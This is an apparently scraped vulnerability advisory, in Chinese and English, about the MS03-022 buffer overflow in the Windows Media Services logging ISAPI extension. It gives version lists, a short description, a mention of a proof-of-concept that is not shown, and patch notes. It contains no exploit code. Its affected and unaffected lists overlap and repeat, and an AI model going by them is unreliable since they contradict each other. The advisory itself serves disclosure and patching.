+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0

- 不受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0

- 漏洞讨论

Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.

- 漏洞利用

The discoverer of this vulnerability is reported to possess working exploit code. This exploit is not publicly available and is not, at this time, known to be circulating in the wild.

The following proof-of-concept exploit has been supplied by Mati &lt;muts@mutsonline.com&gt;:

- 解决方案

** March 9, 2004 - Microsoft has reported that under certain circumstances the original security update provided to address this issue did not function properly and failed to replace the vulnerable file on an affected system. The issue results in situations relating to whether or not Windows Media Services was uninstalled previous to the application of the update. Microsoft has addressed this issue and released an updated Security Bulletin MS03-022. Please see the referenced bulletin for more information.

A patch has been made available for Windows 2000 and Windows 2000 Service Pack 3:


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Server SP3

Microsoft Windows 2000 Datacenter Server SP2

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Datacenter Server SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站